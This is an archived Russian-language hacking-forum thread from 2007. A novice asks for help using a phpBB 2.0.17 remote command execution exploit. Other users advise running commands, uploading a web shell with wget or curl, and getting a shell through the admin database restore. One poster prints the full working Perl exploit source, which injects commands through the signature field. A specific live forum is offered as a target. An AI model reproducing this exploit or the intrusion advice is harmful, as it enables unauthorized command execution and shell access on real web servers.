Просмотр полной версии : Вопрос по сплойту от rst для форума phpbb v.2.0.17
Люди прошу помощи со сплойтом rst для форума phpbb v.2.0.17
Скачал сплойт, запустил... в поле cmd ввел cmd(мб что то другое) мне сплойт пишет что user r57************ sucefull registered. что дальше делать?
DeBugger
27.08.2007, 18:56
Дальше введённая команда должна была выполниться через баг в профиле пользователя.
У меня с этим эксплоитом ни разу ничего не вышло.
А вот r57phpbba2e2.pl - phpBB admin 2 exec exploit иногда работал.
Руками через восстановление БД в админке всё же лучше и надёжнее.
блин я в этом деле совсем не секу...читал читал и болты =)
расскажи как "руками через восстановление базы"? буду благодарен
и еще-использовать команду надо wget или curl чтоб залить шелл на форум. Я так сделал(шелл заливал с ФТП) сплойт пишет тоже самое user registered. Куда дальше идти? ****/forum/r57shell.php? этого файла нету(404 ошибка)
DeBugger
27.08.2007, 20:00
Я обо всех тонкостях прочитал на этом форуме. Советую попробовать поиск.
Например, http://forum.antichat.ru/thread24488.html
я просто не разбираюсь в этом...вот...напиши плз как шеллом пользоваться и как его через сплойт загрузить.
DeBugger
27.08.2007, 20:24
Я бы посоветовал сравнить требования сплойта с реальной ситуацией на форуме. Вдруг он там работать не может. Попробуй выполнить команду ls -la (поправьте люди, если напутал). Если получишь список файлов, можно идти дальше.
а где юзать эту команду? расскажи подробнее плз
DeBugger
27.08.2007, 20:38
Если ты имеешь ввиду именно "phpBB <= 2.0.17 remote command execution exploit" (r57phpBB2017), то про использование всё написано в нём самом. Ввести: r57phpBB2017.pl http://www.site.ru/forum/ ls -la
выдает сообщение user r57**********sucefull registered
DeBugger
29.08.2007, 13:13
А ты уверен в уязвимости форума? Успешная регистрация не гарантирует успешное выполнение комманды.
если хочешь посмотреть на сие чудо-тебе сюда =)
http://torrents.ok.vsi.ru/forum/
Nightmarе
29.08.2007, 15:25
Если не сложно, то объясните суть уязвимости, какой скрипт бажный и т.д.. что именно делают эти сплойты???
DeBugger
29.08.2007, 18:21
Если не сложно, то объясните суть уязвимости, какой скрипт бажный и т.д.. что именно делают эти сплойты???
Вот образец сплойта. Думаю поймёшь, что он делает:
#!/usr/bin/perl
# phpBB <= 2.0.17 remote command execution exploit
# need for work:
# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off
# ------------------------------------------------
# (c)oded by 1dt.w0lf
# RST/GHC
# http://rst.void.ru
# http://ghc.ru
# 03.11.05
use LWP::UserAgent;
use HTTP::Cookies;
if(@ARGV < 2) { usage(); }
head();
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
for($i=0;$i<5;$i++)
{
$rand .= int(rand(9));
}
$name = 'Gavrik'.$rand;
$password = 'Gavrik'.$rand;
$path = $ARGV[0];
$cmd = $ARGV[1];
$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post(
$path.'profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00',
Content => [
'username' => $name,
'email' => $rand.'_bill_gates@microsoft.com',
'new_password' => $password,
'password_confirm' => $password,
'signature' => 'r57:`'.$cmd.'`',
'viewemail' => '0',
'hideonline' => '1',
'notifyreply' => '0',
'notifypm' => '0',
'popup_pm' => '0',
'attachsig' => '0',
'allowbbcode' => '1',
'allowhtml' => '1',
'allowsmilies' => '0',
'mode' => 'register',
'agreed' => 'true',
'coppa' => '0',
'submit' => 'Submit',
],
);
if($res->content =~ /form action=\"profile.php/) { print "Failed to register user $name\r\n"; exit(); }
else { print "Done. User $name successfully registered!\r\n"; }
$res = $xpl->post(
$path.'login.php',
Content => [
'username' => $name,
'password' => $password,
'redirect' => '',
'login' => 'Log in',
],Referer => $path.'login.php');
$res = $xpl->get($path.'profile.php?mode=editprofile');
@content = split("\n",$res->content);
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~\r\n";
for(@content)
{
if(/<\/textarea>/) { $p = 0; }
print $_."\r\n" if $p;
if(/<textarea name="signature"/){ $p = 1; }
}
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~\r\n";
sub head()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~\r\n";
print " PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/ GHC\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~\r\n";
}
sub usage()
{
head();
print " Usage: r57phpBB2017.pl <path> <cmd>\r\n";
print " <path> - Path to forum e.g. http://phpbb.com/forum/\r\n";
print " <cmd> - Command for execute\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~\r\n";
print "(c)oded by 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru\r\n" ;
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~\r\n";
exit();
}
В версии 2.0.19 эта возможность блокирована, но суть баги жива. Через восстановление БД форума можно изменить необходимые поля и получить шелл.
Кстати, форум по ссылке мёртв. Кто-то уже добрался?
Возможно-он не отвечает около 2-х недель. но не я виновник =)
и еще. сплоит выдал: Done. User Gavrik06526 successfully registered! что дальше делать?
blackybr
14.10.2007, 21:33
# need for work:
# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off
это первое что нужно. ес ли это выполняетчся, то лучше использовать все вручную, благо сплоит - один единственный запрос к сайту )
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot